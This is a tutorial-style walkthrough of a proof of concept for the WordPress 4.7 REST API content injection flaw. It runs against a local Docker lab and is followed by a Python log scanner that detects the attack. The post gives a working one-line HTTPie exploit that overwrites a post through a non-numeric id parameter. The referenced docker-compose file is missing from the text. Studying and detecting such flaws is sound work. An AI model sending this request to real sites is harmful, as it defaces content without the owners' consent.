This post walks through a quick proof of concept (PoC) for an old WordPress vulnerability. I’ll be emphasizing the process rather than the vulnerability itself. For this demo, we will exploit a content injection vulnerability in the WordPress REST API; you can read about its technical details in Sucuri’s write-up: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html.
In short, the exploit only requires sending a single REST API call to the WordPress application.
To stage the demo, we will:
- Set up a container stack that runs the vulnerable WordPress 4.7 together with MySQL, created with Docker Compose.
- Make an HTTP POST request whose body carries new content that overwrites the original post. I will use the HTTPie tool; you may choose any tool you’re familiar with, e.g. curl, Postman or Insomnia.
Prerequisites:
- You must have Docker installed. Running “docker version” from the CLI should report a server version.
- You need an HTTP client that can send a JSON HTTP POST. I already have HTTPie on my Mac; I installed it with “brew install httpie”.
Create a directory.
Save the following file as ‘docker-compose.yml’:
Within the same directory run the following command:
$ docker-compose up --force-recreate; docker-compose down -v
You should see Docker downloading images and spinning up the servers. Once finished, you should be able to browse to http://localhost:8080 from your browser. Follow the instructions to finish the installation (enter a site name, username, password and a fake email). You will then see the admin dashboard. Go to Settings > Permalinks and choose the second option to enable pretty links (with pretty permalinks the REST API is reachable under the /wp-json/ path used below). Open another browser window or a new tab and browse to http://localhost:8080 again. You should see your blog and a Hello World post.
To start the exploit, run the following command from the shell/terminal to overwrite the post content.
$ http -f POST localhost:8080/wp-json/wp/v2/posts/1/\?id=123abc \
content:=\"This website has been hacked\"
Now browse to the site again and observe that the content of the “Hello World” blog post has changed.
To end the PoC, press Ctrl+C in the docker-compose terminal; the trailing docker-compose down -v from the command above then removes the containers and their volumes.
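From the defender’s side, the request above has one feature worth alerting on: a write to the posts endpoint whose id query parameter (123abc) is not purely numeric and therefore does not match the numeric post id in the route. The following script is an added example and is not part of the original post; it scans access log lines in Apache/nginx combined format, handles both the pretty-permalink /wp-json/ form and the ?rest_route= form, and returns the requests that carry a non-numeric or mismatched id. The log lines are constructed for the demo and were not produced by any real server; the regexes and function names are my own.

```python
"""Flag WordPress REST API post-update requests whose `id` query parameter is not
purely numeric or differs from the post id in the route.

Added example, not code from the original post. SAMPLE_LOG below is constructed
in combined log format for demonstration; no real server produced it."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

WRITE_METHODS = {"POST", "PUT", "PATCH"}

# The REST route the PoC targets: /wp/v2/posts/<numeric id>, optional trailing slash.
POSTS_ROUTE = re.compile(r"^/wp/v2/posts/(?P<route_id>[0-9]+)/?$")

# Enough of the Apache/nginx combined log format for this check.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>[0-9]{3})'
)

# Constructed sample lines (assumption: one legitimate admin edit, one PoC-style
# request, one request using the ?rest_route= form, and some normal traffic).
SAMPLE_LOG = """\
127.0.0.1 - - [10/Feb/2017:10:00:01 +0000] "GET /wp-json/wp/v2/posts/1 HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
127.0.0.1 - - [10/Feb/2017:10:00:05 +0000] "POST /wp-json/wp/v2/posts/1/?id=123abc HTTP/1.1" 200 812 "-" "HTTPie/0.9.9"
127.0.0.1 - - [10/Feb/2017:10:00:09 +0000] "POST /wp-json/wp/v2/posts/1 HTTP/1.1" 401 97 "-" "curl/7.51.0"
127.0.0.1 - - [10/Feb/2017:10:00:12 +0000] "POST /wp-json/wp/v2/posts/2?id=7 HTTP/1.1" 403 97 "-" "curl/7.51.0"
127.0.0.1 - - [10/Feb/2017:10:00:15 +0000] "POST /index.php?rest_route=/wp/v2/posts/1&id=1abc HTTP/1.1" 200 812 "-" "curl/7.51.0"
127.0.0.1 - - [10/Feb/2017:10:00:20 +0000] "POST /wp-json/wp/v2/posts/1?id=1 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""


def rest_route(target: str) -> Optional[Tuple[str, Dict[str, List[str]]]]:
    """Return (route, query) for a REST API request target, or None if it is not one.
    Pretty permalinks put the route under /wp-json/; otherwise it is in ?rest_route=."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    if parts.path.startswith("/wp-json/"):
        route = parts.path[len("/wp-json"):]
    elif "rest_route" in query:
        route = query["rest_route"][0]
    else:
        return None
    return route, query


def classify(method: str, target: str) -> Optional[str]:
    """Return a reason string if this is a write to the posts endpoint whose `id`
    query parameter is non-numeric or disagrees with the route id, else None."""
    if method not in WRITE_METHODS:
        return None
    parsed = rest_route(target)
    if parsed is None:
        return None
    route, query = parsed
    match = POSTS_ROUTE.match(route)
    if not match:
        return None
    for value in query.get("id", []):
        if not re.fullmatch(r"[0-9]+", value):
            return "non-numeric id"          # e.g. 123abc: overrides the route id
        if int(value) != int(match["route_id"]):
            return "id differs from route id"
    return None


def scan_log(text: str) -> List[Dict[str, str]]:
    """Parse combined-format log lines and collect the suspicious requests.
    The HTTP status is kept so a 200 (write accepted) can be prioritised over a 4xx."""
    hits: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        reason = classify(m["method"], m["target"])
        if reason:
            hits.append({
                "ip": m["ip"], "time": m["time"], "target": m["target"],
                "status": m["status"], "reason": reason,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A patched site answers such a request with an error rather than 200, so the status field is what separates a blocked probe from a successful overwrite when triaging the hits; the mismatch reason is lower severity but still worth a look, since a client normally has no reason to name a different post in the query string than in the route.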